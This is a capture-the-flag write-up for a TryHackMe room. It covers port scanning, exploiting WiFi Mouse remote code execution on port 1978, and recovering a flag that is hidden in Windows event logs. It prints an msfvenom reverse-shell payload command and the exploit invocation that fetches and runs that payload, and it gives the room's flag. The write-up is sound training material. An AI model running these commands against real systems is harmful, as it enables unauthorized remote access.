Micky Mouse Writeup

YCTF – Weekly Micky Mouse VM Challenge Writeup.

Room name: Micky Mouse

Room link: https://tryhackme.com/jr/yctfweekly


When did Micky Mouse completed it's half-century? Micky mouse event was the best event in the world 😁Can you find the flag of YCTF `event?

Hint 1: Have you tried nmap -Pn

(Direct/straight hint)

Hint 2: Micky's 50 Mouse year might help! It's the way to get inside!

(A small google search gave us 1978 as a Micky's 50)

Let's begin with the exploitation!

First we try to ping the machine, but no response, as the ICMP packets are blocked.

So, Let's scan the target using rustscan

└─# rustscan -a
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 

We can see above, that the port 1978 and 3389 are open.

But using nmap, we got the output as host is down

└─# nmap -vv                                                                                                                                            130 ⨯
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)

To bypass this issue, we can try this -Pn, We get the response as host is up and port scan begins!

So, we used Nmap flags -Pn (No ping scan) -O (OS detection) -sV (Service version detection), to scan only port 1978 and 3389.

└─# nmap -p1978,3389 -sV -O -Pn 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for
Host is up (0.16s latency).

1978/tcp open  unisql?
3389/tcp open  ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds

We found out the service and OS running on the target. Then, simple search for the port 1978 unisql leads to this first exploit Wifi Mouse - Remote Code Execution.

Download the exploit https://www.exploit-db.com/exploits/49601

Before running it, create a MSF payload by specifying LHOST and LPORT

└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Now in one tab, run the python http server

In the second tab, listen using netcat

In the third tab, run the exploit!!

python3 mouse.py <Target IP> <tun0 IP> <Payload.exe>

Holaa!! You got the shell!

Now, read the description and Question again! what does it say?

It says, Can you find the flag of YCTF `event?

It was the biggest hint, the word EVENT was repeated in the description and in the question.

Now it makes sense to look into the Windows events

Using the command wevtutil qe Application we can list all the Application events on windows.

Now scrolling just little down, we get the fake flag.

So, I copied the whole log file into my machine and searched for the Base64 strings manually. By searching for the string == we got one string


Using cyberchef to decode the base64 string, we get another hint which says,

did you check event id 69 huh?

So I Tried looking for the event id 69

Now, If you look closely in the 69th event, we can see some strange string


which then uploading to Cyberchef and using Hex decode, gives us the actual flag!

Flag: YCTF{R00m_fu11_0f_m0u53}

Challenge Credits: Munazir

Hope you enjoyed the machine and learned new things from the challenge! 🌟📚

Last updated